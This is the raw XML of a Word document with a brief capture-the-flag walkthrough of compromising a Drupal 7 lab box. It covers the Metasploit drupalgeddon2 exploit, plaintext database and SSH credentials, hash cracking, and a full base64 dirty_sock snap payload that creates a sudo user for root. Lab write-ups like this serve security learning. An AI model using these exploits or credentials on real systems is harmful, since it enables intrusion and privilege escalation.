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9B55" w14:textId="4EDBF8CE" w:rsidR="00125D7D" w:rsidRPr="008E4AC2" w:rsidRDefault="008E4AC2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4AC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E4C608" w14:textId="3F068F62" w:rsidR="008E4AC2" w:rsidRDefault="008E4AC2">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ill start by preforming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an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scan on the box, the results…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7662F" w14:textId="5CCF571A" w:rsidR="008E4AC2" w:rsidRDefault="008E4AC2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FE847A2" wp14:editId="4D33F1C8">
            <wp:extent cx="5943600" cy="411289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0BD4" w14:textId="0A421E3C" w:rsidR="008E4AC2" w:rsidRDefault="008E4AC2">
      <w:r>
        <w:t xml:space="preserve">Looks like there is a website and SSH running on this box. Searching the directories using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Results….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258E9BFF" w14:textId="5124B21F" w:rsidR="008E4AC2" w:rsidRDefault="008E4AC2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548F56B6" wp14:editId="19FE703E">
            <wp:extent cx="5353050" cy="2200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EEE8" w14:textId="77777777" w:rsidR="00C619FA" w:rsidRDefault="00C619FA"/>
    <w:p w14:paraId="3CD49FFA" w14:textId="77777777" w:rsidR="00C619FA" w:rsidRDefault="00C619FA"/>
    <w:p w14:paraId="52A6A04C" w14:textId="765AC2F0" w:rsidR="00C619FA" w:rsidRPr="00C619FA" w:rsidRDefault="00C619FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C619FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFDEA96" w14:textId="440A1A7A" w:rsidR="008E4AC2" w:rsidRDefault="000107F6">
      <w:r>
        <w:t>Going to the webpage brings us to a login screen. Viewing the source of the page shows that they are using Drupal 7.</w:t>
      </w:r>
      <w:r w:rsidR="008E4AC2" w:rsidRPr="008E4AC2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51062DDE" wp14:editId="1216A845">
            <wp:extent cx="5943600" cy="8566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14E" w14:textId="1EECD77B" w:rsidR="000107F6" w:rsidRDefault="000107F6">
      <w:r>
        <w:t xml:space="preserve">A quick google search shows that Drupal 7 is vulnerable to attack. </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001C1F86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="202185F9" w14:textId="7F1352CF" w:rsidR="000107F6" w:rsidRDefault="000107F6"/>
    <w:p w14:paraId="235CDA31" w14:textId="69DEB047" w:rsidR="000107F6" w:rsidRDefault="00C619FA">
      <w:r>
        <w:t xml:space="preserve">After opening </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C619FA">
        <w:t>exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C619FA">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C619FA">
        <w:t>/webapp/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CDFC6" w14:textId="6F7D472A" w:rsidR="00C619FA" w:rsidRDefault="00C619FA">
      <w:r>
        <w:t xml:space="preserve">Set our RHOST, LHOST, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341FF8CA" w14:textId="5896EF6E" w:rsidR="00C619FA" w:rsidRDefault="00C619FA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BBAA2A1" wp14:editId="083AF35D">
            <wp:extent cx="5943600" cy="14941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3517" w14:textId="43A7CF5B" w:rsidR="00C619FA" w:rsidRDefault="00C619FA">
      <w:r>
        <w:t>We have now gained access to the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E75279A" w14:textId="77777777" w:rsidR="00C619FA" w:rsidRDefault="00C619FA"/>
    <w:p w14:paraId="15FD71BE" w14:textId="51991418" w:rsidR="00C619FA" w:rsidRDefault="00C619FA">
      <w:r>
        <w:t xml:space="preserve">Looking in the directory we can access the sites/default folders to get to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>settings.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4CE28" w14:textId="506AF01C" w:rsidR="00C619FA" w:rsidRDefault="00C619FA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62519E1C" wp14:editId="702B83C4">
            <wp:extent cx="3657600" cy="19240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065" w14:textId="3E1437A3" w:rsidR="00C619FA" w:rsidRDefault="00C619FA">
      <w:r>
        <w:t xml:space="preserve">Cat these settings out to find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database user id and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A732B2" w14:textId="6AA3F629" w:rsidR="00C619FA" w:rsidRDefault="00C619FA">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A3B1A" w:rsidRPr="001A3B1A">
        <w:t>drupaluser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001A3B1A" w:rsidRPr="001A3B1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A3B1A" w:rsidRPr="001A3B1A">
        <w:t>CQHEy@9M*m23gBVj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E344D0A" w14:textId="3A7991A0" w:rsidR="001A3B1A" w:rsidRDefault="001A3B1A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3B1A">
        <w:lastRenderedPageBreak/>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3B1A">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3B1A">
        <w:t>drupaluser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3B1A">
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3B1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3B1A">
        <w:t xml:space="preserve">-D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3B1A">
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3B1A">
        <w:t xml:space="preserve"> -e ‘show tables;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D47473" w14:textId="13211407" w:rsidR="003528DC" w:rsidRDefault="003528DC">
      <w:r>
        <w:t xml:space="preserve">enter password </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3B1A">
        <w:t>CQHEy@9M*m23gBVj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7709FE19" w14:textId="39270C4B" w:rsidR="003528DC" w:rsidRDefault="003528DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35E259B2" wp14:editId="79FB4F88">
            <wp:extent cx="5943600" cy="9607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64B3" w14:textId="1DAD7E7A" w:rsidR="003528DC" w:rsidRDefault="003528DC">
      <w:r>
        <w:t>Now to run the hashes through John the ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9D5CE" w14:textId="0027438F" w:rsidR="003528DC" w:rsidRDefault="003528DC">
      <w:r>
        <w:t xml:space="preserve">After cracking the password, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> into the box to gain user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5685C2DA" w14:textId="7D5772E0" w:rsidR="003528DC" w:rsidRDefault="003528DC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003528DC">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="003528DC">
        <w:t>rucetherealadmin</w:t>
      </w:r>
      <w:r>
        <w:t>:booboo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1EDF08D8" w14:textId="5AECB1A3" w:rsidR="003528DC" w:rsidRDefault="00D2410C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l to check permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE775E6" w14:textId="02A559EF" w:rsidR="003528DC" w:rsidRDefault="003528DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CED6669" wp14:editId="186312A4">
            <wp:extent cx="5943600" cy="682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BEAB" w14:textId="45F9F7D2" w:rsidR="00D2410C" w:rsidRDefault="00D2410C">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="001C1F86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D20AD79" w14:textId="77777777" w:rsidR="00D2410C" w:rsidRDefault="00D2410C"/>
    <w:p w14:paraId="743644B0" w14:textId="26B40E17" w:rsidR="00B859BF" w:rsidRDefault="00B859BF">
      <w:r w:rsidRPr="00B859BF">
        <w:t>python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root.snap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64C6E2BE" w14:textId="744E2033" w:rsidR="00D2410C" w:rsidRDefault="00D2410C"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/bin/snap install - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>devmode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meet.snap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00D2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6"/>
    <w:rsid w:val="000107F6"/>
    <w:rsid w:val="001A3B1A"/>
    <w:rsid w:val="003528DC"/>
    <w:rsid w:val="008E4AC2"/>
    <w:rsid w:val="009E5464"/>
    <w:rsid w:val="00B859BF"/>
    <w:rsid w:val="00C1212C"/>
    <w:rsid w:val="00C619FA"/>
    <w:rsid w:val="00D2410C"/>
    <w:rsid w:val="00D7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C413"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{018C5209-1E9E-4E61-8E3D-3B6F07E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pid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2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Uding</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Justin Uding</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-11T11:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-11T12:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>